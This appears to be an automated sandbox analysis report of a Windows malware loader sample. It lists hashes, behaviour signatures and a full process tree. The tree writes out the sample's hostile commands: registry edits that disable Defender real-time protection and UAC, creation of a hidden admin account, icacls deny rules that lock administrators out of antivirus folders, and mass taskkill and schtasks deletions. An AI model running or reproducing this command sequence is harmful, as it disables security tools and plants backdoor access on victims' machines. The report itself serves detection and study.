Analysis
-
max time kernel
103s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
01/04/2025, 15:00
General
-
Target
2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe
-
Size
201KB
-
MD5
f513dc988cb2c77428b754ffb9669040
-
SHA1
e8e5386c5e7e53f0ef1270e92c1b45c2df3bd71a
-
SHA256
a36bb3dbfa3e5ecbbafc07e1f3829035101a2f5883667bf0cbe2e686857a9ccd
-
SHA512
80cbb72d888744352db1fe73139aee3beefb3d98f06c91f90cbc87f3be6470f5b890f41d8a75910a50fec7969cf310802bfba05c99ec70b1090789a1f790e99a
-
SSDEEP
3072:m5S0VvIH4lindUJXw58BkgnyNMIoVtmvVg4gdYbnybcapz/0Ic6o+Fc28V4EK:ma4InuJg58BkgqPoDH49n8Bb/c20Q
Score
10/10
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 2 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Possible privilege escalation attempt 64 IoCs
-
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 1 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 3 IoCs
-
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 23 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\temp\Clean.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\microsoft\Temp\Clean.bat" "3⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc start AppIDSvc4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config AppIDSvc start= Auto4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc start AppMgmt4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config AppMgmt start= Auto4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM mbamservice.EXE /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop MinerGate4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete MinerGate4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\SecurityService" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windows\ServiceRun" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\SecurityService" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\SecurityService2" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\Security Service2" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun" /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun0" /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun1" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun2" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun3" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "AzureSDKService" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "WindowsUpdater" /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "AdobeUppdate" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windows\SpaceManagTask" /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\SecurityService" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windows\ServiceRun" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Microsoft\Windows\WindowsUpdate\SUpdate" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Windows\CampaignManager" /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Windows\FamilySafetyRefresherTask" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Windows\ServiceRun" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Windows\SpaceManagTask" /F4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ImmersiveShell" /v UseActionCenterExperience /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting" /v disable /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵
- Hide Artifacts: Hidden Users
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Programdata /t REG_SZ /d System /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ProgramData /t REG_DWORD /d 0 /f4⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v Exclusions_Paths /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\SysWOW64\net.exenet user John 12345 /add4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user John 12345 /add5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "└Σ∞ΦφΦ±≥≡α≥ε≡√" john /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "└Σ∞ΦφΦ±≥≡α≥ε≡√" john /add5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα" John /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα" John /add5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≤∩≡αΓδσφΦ " John /add4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≤∩≡αΓδσφΦ " John /add5⤵
-
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\COMODO\COMODO Internet Security"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO\COMODO Internet Security" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files (x86)\360\Total Security"4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360\Total Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurity4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safe4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM SPYHUNTER4.EXE /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Program Files\Enigma Software Group\SpyHunter4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe" /deny Admin:(D,F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Program Files (x86)\SpyHunter4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Program Files\SpyHunter4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter\SpyHunter4.exe" /deny Admin:(D,F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter\SpyHunter4.exe" /deny ┬±σ:(D,F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM Cube.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files (x86)\Cezurity"4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Cezurity"4⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Cezurity4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\McAfee"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\McAfee"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\McAfee.com"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\McAfee.com" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Avira4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"4⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESET4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Kaspersky Lab"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files (x86)\Kaspersky Lab"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVG"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files (x86)\AVG"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Users\Admin\AppData\Local\Temp\grizzly-setup-cache"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\Temp\grizzly-setup-cache" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\appdata\roaming\microsoft\windows\helper.exe"4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\olly.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\iostream.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\SystemIdle.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\System Idle.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\AppData\Roaming\winhost.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\AppData\roaming\bot.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\AppData\roaming\nvidiadriver.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft\windows\helper.exe" /deny Admin:(D,F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\olly.exe" /deny Admin:(D,F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\iostream.exe" /deny Admin:(D,F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\SystemIdle.exe" /deny Admin:(D,F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\System Idle.exe" /deny Admin:(D,F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\Roaming\winhost.exe" /deny Admin:(D,F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\bot.exe" /deny Admin:(D,F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\nvidiadriver.exe" /deny Admin:(D,F)4⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=7777 name="Block_7777"4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule dir=out action=block protocol=tcp localport=7777 name="Block_7777"4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\Programdata\system32\logs\svchost.exe"4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM systemcore.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\roaming\subdir"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\subdir" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM serviceon.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM ifxpers.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "idle driver.exe" /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft software"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft software" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "taskhost.exe" /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "intel1s.exe" /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "intel.exe" /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "intel1.exe" /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "taskhostss.exe" /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft software"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\Roaming\Microsoft\SystemCertificates" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM moonlight.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM moonlight.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\windows\syswow64\xmr64"4⤵
- Drops file in System32 directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\syswow64\xmr64" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel1.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\GOOGLE"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\GOOGLE" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ErrorCheck.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\macromedia"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\Roaming\macromedia" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM sidebar.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\programdata\System324⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM client.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostxmrig.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\windows\hhsm"4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\hhsm" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AudioSystemDriver.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft\Speech\"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft\Speech" /deny Admin:(OI)(CI)(F)4⤵
